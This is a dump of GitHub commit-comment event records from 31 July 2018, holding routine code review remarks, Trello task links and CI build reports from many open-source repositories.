{"id":"8046795464","type":"CommitCommentEvent","actor":{"login":"eliseuegewarth"},"repo":{"name":"interlegis/sapl"},"payload":{"comment":{"id":29911951,"position":5,"line":52,"path":"sapl/redireciona_urls/urls.py","commit_id":"cb274d08b1de4f24fca172b6dab74989d4123da1","created_at":"2018-07-31T21:28:52Z","updated_at":"2018-07-31T21:28:52Z","author_association":"MEMBER","body":"Essa url é para arquivos estáticos (textos integrais de normas) a solicitação veio através de um ticket de uma casa migrada recentemente. Perguntei ao usuário que solicitou, mas ele não respondeu a tal informação, por isso fiz o redirecionamento."}},"created_at":"2018-07-31T21:28:52Z"}
{"id":"8046797582","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/RDBMS-API-Full"},"payload":{"comment":{"id":29911958,"position":null,"line":null,"path":null,"commit_id":"4bd8c1d3446ccb8bfad0d0502d1ed3610aa98482","created_at":"2018-07-31T21:29:19Z","updated_at":"2018-07-31T21:29:19Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Complete the GET request for Posts](https://trello.com/c/FTTfJ3Gr/7-complete-the-get-request-for-posts)"}},"created_at":"2018-07-31T21:29:19Z"}
{"id":"8046797650","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/RDBMS-API-Full"},"payload":{"comment":{"id":29911959,"position":null,"line":null,"path":null,"commit_id":"15acef9a6809205cc8779e2df5fde86e90ade233","created_at":"2018-07-31T21:29:20Z","updated_at":"2018-07-31T21:29:20Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Complete the GET request for Posts](https://trello.com/c/FTTfJ3Gr/7-complete-the-get-request-for-posts)"}},"created_at":"2018-07-31T21:29:20Z"}
{"id":"8046799505","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/RDBMS-API-Full"},"payload":{"comment":{"id":29911964,"position":null,"line":null,"path":null,"commit_id":"4bd8c1d3446ccb8bfad0d0502d1ed3610aa98482","created_at":"2018-07-31T21:29:38Z","updated_at":"2018-07-31T21:29:38Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Complete the Post request for Post](https://trello.com/c/J3vFyqs7/8-complete-the-post-request-for-post)"}},"created_at":"2018-07-31T21:29:38Z"}
{"id":"8046799598","type":"CommitCommentEvent","actor":{"login":"doctornkz"},"repo":{"name":"darksky83/plugin.video.tviplayer"},"payload":{"comment":{"id":29911965,"position":null,"line":null,"path":null,"commit_id":"71e493f3801bfc1319f385fd7efe48783c05bad4","created_at":"2018-07-31T21:29:39Z","updated_at":"2018-07-31T21:29:39Z","author_association":"NONE","body":"Hey, man! You fixed it!!! Congratulations! Muito obrigado!"}},"created_at":"2018-07-31T21:29:39Z"}
{"id":"8046799641","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/RDBMS-API-Full"},"payload":{"comment":{"id":29911966,"position":null,"line":null,"path":null,"commit_id":"9f0f17f81af9b5a5fb34ed11461eb79e7d449209","created_at":"2018-07-31T21:29:40Z","updated_at":"2018-07-31T21:29:40Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Complete the Post request for Post](https://trello.com/c/J3vFyqs7/8-complete-the-post-request-for-post)"}},"created_at":"2018-07-31T21:29:40Z"}
{"id":"8046801570","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/RDBMS-API-Full"},"payload":{"comment":{"id":29911969,"position":null,"line":null,"path":null,"commit_id":"d0ff9e4c244d4767644afea0e60b41a9b3abaa1c","created_at":"2018-07-31T21:30:02Z","updated_at":"2018-07-31T21:30:02Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [GET individual post by id](https://trello.com/c/r0TaiPJa/11-get-individual-post-by-id)"}},"created_at":"2018-07-31T21:30:02Z"}
{"id":"8046802376","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/RDBMS-API-Full"},"payload":{"comment":{"id":29911971,"position":null,"line":null,"path":null,"commit_id":"ce2c968a14a85d03a6399f2defc93799276f7c0c","created_at":"2018-07-31T21:30:13Z","updated_at":"2018-07-31T21:30:13Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [GET individual user by id](https://trello.com/c/5jAaWo53/10-get-individual-user-by-id)"}},"created_at":"2018-07-31T21:30:13Z"}
{"id":"8046812207","type":"CommitCommentEvent","actor":{"login":"moylop260"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29911996,"position":null,"line":null,"path":null,"commit_id":"65ad60665e54a7e61d3d064df63457d0097587bd","created_at":"2018-07-31T21:32:17Z","updated_at":"2018-07-31T21:32:17Z","author_association":"CONTRIBUTOR","body":"Excellent!"}},"created_at":"2018-07-31T21:32:17Z"}
{"id":"8046812245","type":"CommitCommentEvent","actor":{"login":"omidkrad"},"repo":{"name":"skalfyfan/dockerized-puppeteer"},"payload":{"comment":{"id":29911997,"position":12,"line":12,"path":"docker-compose.yml","commit_id":"9d8b8e558cb45acccf7778b75315520cb2031aae","created_at":"2018-07-31T21:32:18Z","updated_at":"2018-07-31T21:32:18Z","author_association":"NONE","body":"[links](https://docs.docker.com/compose/compose-file/#links) is deprecated and may be removed. You may want to replace this with `depends_on`."}},"created_at":"2018-07-31T21:32:18Z"}
{"id":"8046812544","type":"CommitCommentEvent","actor":{"login":"harishchilamkurthi"},"repo":{"name":"harishchilamkurthi/TheRecipeBook-Web"},"payload":{"comment":{"id":29911998,"position":null,"line":null,"path":null,"commit_id":"2408aa889b1737eb0ae97aa4ebc0d5d0d7b44f42","created_at":"2018-07-31T21:32:22Z","updated_at":"2018-07-31T21:32:22Z","author_association":"OWNER","body":"**Task** : click on single item in recipe item and add it in recipe detail section. emit and event on single recipe item component that was clicked and get this event to recipes component with recipe details, pass event data which recipe was selected to that component.\r\n**Note** : use property and event binding."}},"created_at":"2018-07-31T21:32:22Z"}
{"id":"8046813806","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29911999,"position":null,"line":null,"path":null,"commit_id":"713ee67e2f5629945dff7561ea257334862554b2","created_at":"2018-07-31T21:32:39Z","updated_at":"2018-07-31T21:32:39Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10-appkitb4/1/display/redirect) (on internal Jenkins) failed in stage 'Test docs' 🔥\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10-appkitb4/1//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10-appkitb4/713ee67e2f5629945dff7561ea257334862554b2/1/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10-appkitb4/713ee67e2f5629945dff7561ea257334862554b2/1/jenkins-results/apicomparison/index.html) (🔥 breaking changes 🔥)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10-appkitb4/713ee67e2f5629945dff7561ea257334862554b2/1/jenkins-results/generator-diff/index.html) (please review changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10-appkitb4/713ee67e2f5629945dff7561ea257334862554b2/1/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-31T21:32:39Z"}
{"id":"8046814700","type":"CommitCommentEvent","actor":{"login":"Abbyston"},"repo":{"name":"Rapptz/discord.py"},"payload":{"comment":{"id":29912001,"position":null,"line":null,"path":null,"commit_id":"1863a1c6636f53592519320a173ec9573c090c0b","created_at":"2018-07-31T21:32:50Z","updated_at":"2018-07-31T21:32:50Z","author_association":"NONE","body":"Where do I put this in?"}},"created_at":"2018-07-31T21:32:50Z"}
{"id":"8046816268","type":"CommitCommentEvent","actor":{"login":"welldan97"},"repo":{"name":"Zhukov87/translator-en-ru-"},"payload":{"comment":{"id":29912005,"position":25,"line":25,"path":"src/action creators/translator.action.js","commit_id":"4a5656f8199d21a27c0b4b6c6db7da543064031e","created_at":"2018-07-31T21:33:11Z","updated_at":"2018-07-31T21:33:11Z","author_association":"NONE","body":"`err = false` странное присвоение"}},"created_at":"2018-07-31T21:33:11Z"}
{"id":"8046818386","type":"CommitCommentEvent","actor":{"login":"welldan97"},"repo":{"name":"Zhukov87/translator-en-ru-"},"payload":{"comment":{"id":29912008,"position":25,"line":25,"path":"src/action creators/translator.action.js","commit_id":"4a5656f8199d21a27c0b4b6c6db7da543064031e","created_at":"2018-07-31T21:33:39Z","updated_at":"2018-07-31T21:33:39Z","author_association":"NONE","body":"тоже на 34"}},"created_at":"2018-07-31T21:33:39Z"}
{"id":"8046822886","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29912018,"position":null,"line":null,"path":null,"commit_id":"94b91dd2d837518b0d2a86024139ba050a3724b6","created_at":"2018-07-31T21:34:39Z","updated_at":"2018-07-31T21:34:39Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/94b91dd2d837518b0d2a86024139ba050a3724b6/index.html"}},"created_at":"2018-07-31T21:34:39Z"}
{"id":"8046822986","type":"CommitCommentEvent","actor":{"login":"Djyinks"},"repo":{"name":"Djyinks/Hell_world"},"payload":{"comment":{"id":29912019,"position":null,"line":null,"path":null,"commit_id":"eff711dac6f74f30b87a9e879f0836a2293c9497","created_at":"2018-07-31T21:34:41Z","updated_at":"2018-07-31T21:34:41Z","author_association":"OWNER","body":"Welcome message"}},"created_at":"2018-07-31T21:34:41Z"}
{"id":"8046824066","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29912020,"position":null,"line":null,"path":null,"commit_id":"27eba341513fb3cf9b68ad88c726db2a36775544","created_at":"2018-07-31T21:34:55Z","updated_at":"2018-07-31T21:34:55Z","author_association":"NONE","body":"158270028_Issue#6422 (Nigusse) - Win64-Windows-7-VisualStudio-14: OK (2957 of 2957 tests passed, 3 test warnings)\n\nMessages:\n\n * 1 test had: ERR diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: MTR small diffs.\n * 2 tests had: BND diffs.\n * 2 tests had: MTD diffs.\n * 2 tests had: RDD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27eba341513fb3cf9b68ad88c726db2a36775544-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27eba341513fb3cf9b68ad88c726db2a36775544-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T21:34:55Z"}
{"id":"8046824905","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29912022,"position":157,"line":157,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T21:35:08Z","updated_at":"2018-07-31T21:35:08Z","author_association":"COLLABORATOR","body":"Hmm, right. I think we should ask Herb about the intention here. I believe that the documentation is outdated though. Since C++17, we can have an aggregate with base classes, as long as the base classes are also aggregates."}},"created_at":"2018-07-31T21:35:08Z"}
{"id":"8046827391","type":"CommitCommentEvent","actor":{"login":"awjuliani"},"repo":{"name":"Unity-Technologies/ml-agents"},"payload":{"comment":{"id":29912026,"position":29,"line":340,"path":"python/unitytrainers/ppo/trainer.py","commit_id":"5ff7a49d0d2b4639bbb0ca9ff636e018359c127c","created_at":"2018-07-31T21:35:42Z","updated_at":"2018-07-31T21:35:42Z","author_association":"COLLABORATOR","body":"This should be a separate branch/PR."}},"created_at":"2018-07-31T21:35:42Z"}
{"id":"8046828427","type":"CommitCommentEvent","actor":{"login":"hermanventer"},"repo":{"name":"facebook/prepack"},"payload":{"comment":{"id":29912028,"position":14,"line":68,"path":"src/values/ArrayValue.js","commit_id":"68744f9268388687490c05c6c17986e4a84f5f7b","created_at":"2018-07-31T21:35:56Z","updated_at":"2018-07-31T21:35:56Z","author_association":"CONTRIBUTOR","body":"The array is not really unknown, is it?"}},"created_at":"2018-07-31T21:35:56Z"}
{"id":"8046829626","type":"CommitCommentEvent","actor":{"login":"musicb0x"},"repo":{"name":"DooDip/esp8266-Radio"},"payload":{"comment":{"id":29912032,"position":null,"line":null,"path":null,"commit_id":"239d40aa1ffa1fd5e7192c476982b7477de4654d","created_at":"2018-07-31T21:36:12Z","updated_at":"2018-07-31T21:36:12Z","author_association":"NONE","body":"No sound output"}},"created_at":"2018-07-31T21:36:12Z"}
{"id":"8046831946","type":"CommitCommentEvent","actor":{"login":"Sushama-savale"},"repo":{"name":"Sushama-savale/website"},"payload":{"comment":{"id":29912039,"position":4,"line":4,"path":"lipsum.txt","commit_id":"c0d16aefba2a63e8b69e1a5b926e77ba9f53cbd5","created_at":"2018-07-31T21:36:42Z","updated_at":"2018-07-31T21:36:42Z","author_association":"OWNER","body":"comment 1"}},"created_at":"2018-07-31T21:36:42Z"}
{"id":"8046832707","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29912040,"position":null,"line":null,"path":null,"commit_id":"3e972f46556ff2ace57c4584d01827aa3b61f826","created_at":"2018-07-31T21:36:51Z","updated_at":"2018-07-31T21:36:51Z","author_association":"NONE","body":"158069813_#5675 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2338 of 2338 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e972f46556ff2ace57c4584d01827aa3b61f826-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e972f46556ff2ace57c4584d01827aa3b61f826-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e972f46556ff2ace57c4584d01827aa3b61f826-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-31T21:36:51Z"}
{"id":"8046833072","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29912041,"position":null,"line":null,"path":null,"commit_id":"db721d7d0cafee263937cecfadf03051df11c9b1","created_at":"2018-07-31T21:36:56Z","updated_at":"2018-07-31T21:36:56Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/db721d7d0cafee263937cecfadf03051df11c9b1/index.html"}},"created_at":"2018-07-31T21:36:56Z"}
{"id":"8046834310","type":"CommitCommentEvent","actor":{"login":"trueadm"},"repo":{"name":"facebook/prepack"},"payload":{"comment":{"id":29912043,"position":14,"line":68,"path":"src/values/ArrayValue.js","commit_id":"68744f9268388687490c05c6c17986e4a84f5f7b","created_at":"2018-07-31T21:37:14Z","updated_at":"2018-07-31T21:37:14Z","author_association":"CONTRIBUTOR","body":"We don't know anything about it, other than it's an array. We've been using the \"unknown array\" terminology for a while now."}},"created_at":"2018-07-31T21:37:14Z"}
{"id":"8046836509","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/riveralive-cms"},"payload":{"comment":{"id":29912046,"position":null,"line":null,"path":null,"commit_id":"4310916cc7e6ab4afe7aa2516f1be733ee1477d7","created_at":"2018-07-31T21:37:43Z","updated_at":"2018-07-31T21:37:43Z","author_association":"MEMBER","body":"Created multidev environment [riveralive-cms#ci-206](https://dashboard.pantheon.io/sites/ced938b0-bbbf-4ed2-ba1c-98b66d8ba2be#ci-206).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-206-riveralive-cms.pantheonsite.io/)"}},"created_at":"2018-07-31T21:37:43Z"}
{"id":"8046837231","type":"CommitCommentEvent","actor":{"login":"fredpoissant"},"repo":{"name":"Odyssey-Interactive/Star_Quest_Prototype"},"payload":{"comment":{"id":29912048,"position":null,"line":null,"path":null,"commit_id":"797673292791e740f98c74b7347cecfec9df9f68","created_at":"2018-07-31T21:37:53Z","updated_at":"2018-07-31T21:37:53Z","author_association":"MEMBER","body":"Sorry still learning HTML"}},"created_at":"2018-07-31T21:37:53Z"}
{"id":"8046837403","type":"CommitCommentEvent","actor":{"login":"Zag70"},"repo":{"name":"wngjw/exogig"},"payload":{"comment":{"id":29912049,"position":null,"line":null,"path":null,"commit_id":"9efeab47413bcf968d133b9beade96348cac6d9e","created_at":"2018-07-31T21:37:55Z","updated_at":"2018-07-31T21:37:55Z","author_association":"COLLABORATOR","body":"Good commit"}},"created_at":"2018-07-31T21:37:55Z"}
{"id":"8046839190","type":"CommitCommentEvent","actor":{"login":"wolfenste"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29912052,"position":18,"line":23,"path":"tests/TicTacToeTest.php","commit_id":"9021613e442df8ed09d88171cb77476ee7d35c41","created_at":"2018-07-31T21:38:19Z","updated_at":"2018-07-31T21:38:19Z","author_association":"OWNER","body":"The downside of using a small application to learn good programming style is that it misses exactly this important point. Because it is too small, magic constants can't brake it ... Same with the other points. It is important to feel the pain of having bad habits in programming, it is important to see how exactly things impact other things. Otherwise it is just imitation... if someone remembers to do so :)\r\n\r\nI created this function just to spare me for writing the same thing multiple times. This is not the real function that will feed the Map object. For testing purpose, I can write the entire Map parameter element by element.\r\n\r\nI will do it tomorrow correctly, I do not have access to a repo right now."}},"created_at":"2018-07-31T21:38:19Z"}
{"id":"8046839761","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29912055,"position":null,"line":null,"path":null,"commit_id":"ca37f5981899f1dd42ced2efd423272af28079de","created_at":"2018-07-31T21:38:27Z","updated_at":"2018-07-31T21:38:27Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-1050](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-1050).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1050-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-31T21:38:27Z"}
{"id":"8046841234","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29912058,"position":null,"line":null,"path":null,"commit_id":"3e972f46556ff2ace57c4584d01827aa3b61f826","created_at":"2018-07-31T21:38:48Z","updated_at":"2018-07-31T21:38:48Z","author_association":"NONE","body":"158069813_#5675 (Nigusse) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e972f46556ff2ace57c4584d01827aa3b61f826-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-31T21:38:48Z"}
{"id":"8046844402","type":"CommitCommentEvent","actor":{"login":"Lootyhoof"},"repo":{"name":"Lootyhoof/stylem"},"payload":{"comment":{"id":29912079,"position":null,"line":null,"path":null,"commit_id":"e26aea1838de49b079e77da7cd457befe9352b34","created_at":"2018-07-31T21:39:31Z","updated_at":"2018-07-31T21:39:31Z","author_association":"OWNER","body":"@FranklinDM\r\nThis has some string changes for our new Stylish warning - for now I just put in `en-US` text everywhere. If you want to make any changes to TL (or others) let me know."}},"created_at":"2018-07-31T21:39:31Z"}
{"id":"8046844866","type":"CommitCommentEvent","actor":{"login":"MilhouseVH"},"repo":{"name":"LibreELEC/LibreELEC.tv"},"payload":{"comment":{"id":29912080,"position":29,"line":29,"path":"packages/devel/flatbuffers/package.mk","commit_id":"2b68dbb30e6fee8ca79d42d070de6d6ea2436627","created_at":"2018-07-31T21:39:38Z","updated_at":"2018-07-31T21:39:38Z","author_association":"CONTRIBUTOR","body":"Thanks - branch updated."}},"created_at":"2018-07-31T21:39:38Z"}
{"id":"8046845215","type":"CommitCommentEvent","actor":{"login":"hermanventer"},"repo":{"name":"facebook/prepack"},"payload":{"comment":{"id":29912084,"position":5,"line":711,"path":"src/realm.js","commit_id":"68744f9268388687490c05c6c17986e4a84f5f7b","created_at":"2018-07-31T21:39:43Z","updated_at":"2018-07-31T21:39:43Z","author_association":"CONTRIBUTOR","body":"The name suggests that the property binding still has to be checked. How about __propertyHasBeenChecked? I remain perplexed as to why you don't use the map to see if the binding has been checked."}},"created_at":"2018-07-31T21:39:43Z"}
{"id":"8046845235","type":"CommitCommentEvent","actor":{"login":"Harmon758"},"repo":{"name":"Rapptz/discord.py"},"payload":{"comment":{"id":29912085,"position":null,"line":null,"path":null,"commit_id":"1863a1c6636f53592519320a173ec9573c090c0b","created_at":"2018-07-31T21:39:43Z","updated_at":"2018-07-31T21:39:43Z","author_association":"CONTRIBUTOR","body":"@Abbyston Not sure what you mean, but as the commit shows, the changed file is `compat.py`.\r\nFor more information, see #1249."}},"created_at":"2018-07-31T21:39:43Z"}
{"id":"8046849274","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29912100,"position":null,"line":null,"path":null,"commit_id":"cf116b4cf259c92412ec4d7c6dec4a68e451806c","created_at":"2018-07-31T21:40:39Z","updated_at":"2018-07-31T21:40:39Z","author_association":"NONE","body":"#6868-EngRefEquationFixPart1 (RKStrand) - x86_64-MacOS-10.9-clang: OK (2955 of 2956 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 660\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cf116b4cf259c92412ec4d7c6dec4a68e451806c-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cf116b4cf259c92412ec4d7c6dec4a68e451806c-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-31T21:40:39Z"}
{"id":"8046849439","type":"CommitCommentEvent","actor":{"login":"trueadm"},"repo":{"name":"facebook/prepack"},"payload":{"comment":{"id":29912101,"position":5,"line":711,"path":"src/realm.js","commit_id":"68744f9268388687490c05c6c17986e4a84f5f7b","created_at":"2018-07-31T21:40:41Z","updated_at":"2018-07-31T21:40:41Z","author_association":"CONTRIBUTOR","body":"I didn't make this logic, it's pre-existing logic in `realm.js`."}},"created_at":"2018-07-31T21:40:41Z"}
{"id":"8046851551","type":"CommitCommentEvent","actor":{"login":"cyraid"},"repo":{"name":"resin-io-projects/resin-wpe"},"payload":{"comment":{"id":29912107,"position":null,"line":null,"path":null,"commit_id":"e4a36b78db51d8d927c9cb8ff179adfe78c1384c","created_at":"2018-07-31T21:41:11Z","updated_at":"2018-07-31T21:41:11Z","author_association":"NONE","body":"Looks like it works pretty well for me. Should we start another branch with newer versions?"}},"created_at":"2018-07-31T21:41:11Z"}
{"id":"8046854279","type":"CommitCommentEvent","actor":{"login":"rortegaa"},"repo":{"name":"rortegaa/paginaLaravel"},"payload":{"comment":{"id":29912112,"position":null,"line":null,"path":null,"commit_id":"72c9da667c9c38c395d7a81f5a24f0a01d6b407f","created_at":"2018-07-31T21:41:48Z","updated_at":"2018-07-31T21:41:48Z","author_association":"OWNER","body":"muy bien, vamos progresando "}},"created_at":"2018-07-31T21:41:48Z"}
{"id":"8046854341","type":"CommitCommentEvent","actor":{"login":"Zhukov87"},"repo":{"name":"Zhukov87/translator-en-ru-"},"payload":{"comment":{"id":29912113,"position":25,"line":25,"path":"src/action creators/translator.action.js","commit_id":"4a5656f8199d21a27c0b4b6c6db7da543064031e","created_at":"2018-07-31T21:41:48Z","updated_at":"2018-07-31T21:41:48Z","author_association":"OWNER","body":"У тебя что с вотсапом?\nПозвони если можешь\n\nср, 1 авг. 2018 г., 0:33 Dmitry Yakimov <notifications@github.com>:\n\n> тоже на 34\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Zhukov87/translator-en-ru-/commit/4a5656f8199d21a27c0b4b6c6db7da543064031e#commitcomment-29912008>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFHEshdByligNh8D5yYCJSG34nwO9PNXks5uMM0zgaJpZM4Vpcis>\n> .\n>\n"}},"created_at":"2018-07-31T21:41:48Z"}
{"id":"8046855534","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29912116,"position":null,"line":null,"path":null,"commit_id":"ca8564d2b48ce4501d4de9c4a5f9d3e4ffe836dc","created_at":"2018-07-31T21:42:07Z","updated_at":"2018-07-31T21:42:07Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/ca8564d2b48ce4501d4de9c4a5f9d3e4ffe836dc/index.html"}},"created_at":"2018-07-31T21:42:07Z"}
{"id":"8046856860","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/RDBMS-API-Full"},"payload":{"comment":{"id":29912120,"position":null,"line":null,"path":null,"commit_id":"ebf45d47c9c51d46483e9a7d6131f2cca86a84b9","created_at":"2018-07-31T21:42:25Z","updated_at":"2018-07-31T21:42:25Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[DELETE] /users/:id This route should delete the specified user.](https://trello.com/c/jNmshdOY/14-delete-users-id-this-route-should-delete-the-specified-user)"}},"created_at":"2018-07-31T21:42:25Z"}
{"id":"8046857342","type":"CommitCommentEvent","actor":{"login":"garbear"},"repo":{"name":"wsnipex/xbmc"},"payload":{"comment":{"id":29912123,"position":4,"line":16,"path":"xbmc/cores/RetroPlayer/savestates/CMakeLists.txt","commit_id":"67e6b8d6db69dcf421297b4b11a0d7f1ea10fb50","created_at":"2018-07-31T21:42:32Z","updated_at":"2018-07-31T21:42:32Z","author_association":"NONE","body":"I'm getting:\r\n```\r\nCMake Error at xbmc/cores/RetroPlayer/savestates/CMakeLists.txt:16 (add_dependencies):\r\n  Cannot add target-level dependencies to non-existent target\r\n  \"retroplayer_savestates\".\r\n\r\n  The add_dependencies works for top-level logical targets created by the\r\n  add_executable, add_library, or add_custom_target commands.  If you want to\r\n  add file-level dependencies see the DEPENDS option of the add_custom_target\r\n  and add_custom_command commands.\r\n```\r\n\r\nWhen I artifically force the `retroplayer_messages` target before `retroplayer_savestates` then it works. I'll putz around to see if I can fix this."}},"created_at":"2018-07-31T21:42:32Z"}
{"id":"8046857940","type":"CommitCommentEvent","actor":{"login":"hermanventer"},"repo":{"name":"facebook/prepack"},"payload":{"comment":{"id":29912126,"position":14,"line":68,"path":"src/values/ArrayValue.js","commit_id":"68744f9268388687490c05c6c17986e4a84f5f7b","created_at":"2018-07-31T21:42:40Z","updated_at":"2018-07-31T21:42:40Z","author_association":"CONTRIBUTOR","body":"We know it is an array and we know the identity of the array. What we do not know is the values of individual numeric properties. So it should either be createArrayWithWidenedNumericProperty or just createWidenedArray. Unknown is not helpful here. If it is used in other places, there should probably be an issue to fix those places. Meanwhile we can stop digging this hole deeper."}},"created_at":"2018-07-31T21:42:40Z"}
{"id":"8046864358","type":"CommitCommentEvent","actor":{"login":"vincentpierre"},"repo":{"name":"Unity-Technologies/ml-agents"},"payload":{"comment":{"id":29912137,"position":29,"line":340,"path":"python/unitytrainers/ppo/trainer.py","commit_id":"5ff7a49d0d2b4639bbb0ca9ff636e018359c127c","created_at":"2018-07-31T21:44:10Z","updated_at":"2018-07-31T21:44:10Z","author_association":"CONTRIBUTOR","body":"Just a little incentive to merge this branch 😈 \r\nI will make a separate PR with the same code"}},"created_at":"2018-07-31T21:44:10Z"}
{"id":"8046867184","type":"CommitCommentEvent","actor":{"login":"EECOLOR"},"repo":{"name":"webpack/webpack"},"payload":{"comment":{"id":29912152,"position":5,"line":133,"path":"lib/HotModuleReplacementPlugin.js","commit_id":"6192e5b4131ca630ae7f71bd2eca23b99e82d391","created_at":"2018-07-31T21:44:48Z","updated_at":"2018-07-31T21:44:48Z","author_association":"NONE","body":"I think this is a bug. \r\n\r\n`compilation.hooks.chunkAsset.call(\"HotModuleReplacementPlugin\", currentChunk, filename)` should be `compilation.hooks.chunkAsset.call(currentChunk, filename)`"}},"created_at":"2018-07-31T21:44:48Z"}
